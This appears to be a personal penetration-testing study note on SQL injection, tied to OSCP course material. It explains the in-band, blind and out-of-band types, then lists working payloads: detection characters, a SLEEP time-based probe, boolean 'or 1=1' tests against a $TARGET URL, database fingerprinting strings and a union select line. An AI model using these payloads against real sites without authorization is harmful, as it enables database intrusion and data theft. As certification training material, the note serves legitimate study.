Operators Handbook pg 324
OSCP Book pg 756
## Types of SQL Injections
SQL injections typically fall under three categories: In-band SQLi (Classic), Inferential SQLi (Blind) and Out-of-band SQLi. You can classify SQL injections types based on the methods they use to access backend data and their damage potential.
### **In-band SQLi**
The attacker uses the same channel of communication to launch their attacks and to gather their results. In-band SQLi’s simplicity and efficiency make it one of the most common types of SQLi attack. There are two sub-variations of this method:
-   **Error-based SQLi**—the attacker performs actions that cause the database to produce error messages. The attacker can potentially use the data provided by these error messages to gather information about the structure of the database.
-   **Union-based SQLi**—this technique takes advantage of the UNION SQL operator, which fuses multiple select statements generated by the database to get a single HTTP response. This response may contain data that can be leveraged by the attacker.
### **Inferential (Blind) SQLi**
The attacker sends data payloads to the server and observes the response and behavior of the server to learn more about its structure. This method is called blind SQLi because the data is not transferred from the website database to the attacker, thus the attacker cannot see information about the attack in-band.
Blind SQL injections rely on the response and behavioral patterns of the server so they are typically slower to execute but may be just as harmful. Blind SQL injections can be classified as follows:
-   **Boolean**—that attacker sends a SQL query to the database prompting the application to return a result. The result will vary depending on whether the query is true or false. Based on the result, the information within the HTTP response will modify or stay unchanged. The attacker can then work out if the message generated a true or false result.
-   **Time-based**—attacker sends a SQL query to the database, which makes the database wait (for a period in seconds) before it can react. The attacker can see from the time the database takes to respond, whether a query is true or false. Based on the result, an HTTP response will be generated instantly or after a waiting period. The attacker can thus work out if the message they used returned true or false, without relying on data from the database.
### **Out-of-band SQLi**
The attacker can only carry out this form of attack when certain features are enabled on the database server used by the web application. This form of attack is primarily used as an alternative to the in-band and inferential SQLi techniques.
Out-of-band SQLi is performed when the attacker can’t use the same channel to launch the attack and gather information, or when a server is too slow or unstable for these actions to be performed. These techniques count on the capacity of the server to create DNS or HTTP requests to transfer data to an attacker.
---
https://exploit.ph/web-hacking/2014/12/02/sql-injections/
#### Detection
```
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection#entry-point-detection
```
Try the following characters manually or in Burp Intruder where ever you see a parameter:
```
'
%27
"
%22
#
%23
,
%2C
;
%3B
)
' -- -
%27 -- -
" -- -
%22 -- -
# -- -
%23 -- -
; -- -
%3B -- -
) -- -
```
Notice how only the 18th payload has the same length as the baseline.  Meaning we should be able to manually load that payload `) -- - ` and the page would load correctly.
Test further with sleep:
```sql
&job=1)(SELECT * FROM (SELECT(SLEEP(5)))OQkj)#&minTime=1466674406.084434 -- -
```
#### Boolean Based Detection
Original URL:
```
http://$TARGET/view.php?id=1141
```
Quick injection test:
```
http://$TARGET/view.php?id=1141'
```
Same results if we change the parameter to something non existent.
```
http://$TARGET/view.php?id=9999
```
Testing for Boolean logic (True statement):
```
http://$TARGET/view.php?id=9999' or '1'='1
```
Page loads correctly!
Testing for Boolean logic (False statement):
```
http://$TARGET/view.php?id=9999' or '1'='2
```
Page does not load correctly!
#### Database Detection
MySQL MSSQL MariaDB testing:
```
'||(SELECT '')||'
```
Oracle testing:
```
'||(SELECT '' FROM dual)||'
```
If the page loads correctly, that should mean you found an injection point.
#### Union command injection
All we have to do here is utilize union for command injection:
```
) union select 'whoami' -- -
```
#### SQL Login bypass
Use Intruder (Battering ram) + PayloadAllTheThings:
[[SQL Payload]]
#### SQL Payloads
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection
See Operators Handbook pg 60 for more!
#### MySql
[[1.2_MySQL]]
#### MariaDB
[[1.3_MariaDB]]
#### OracleDB
[[1.4_OracleDB]]
#### MSSQL
[[1.5_MSSQLDB]]
#### MongoDB
[[Port 27017 - MongoDB ~]]
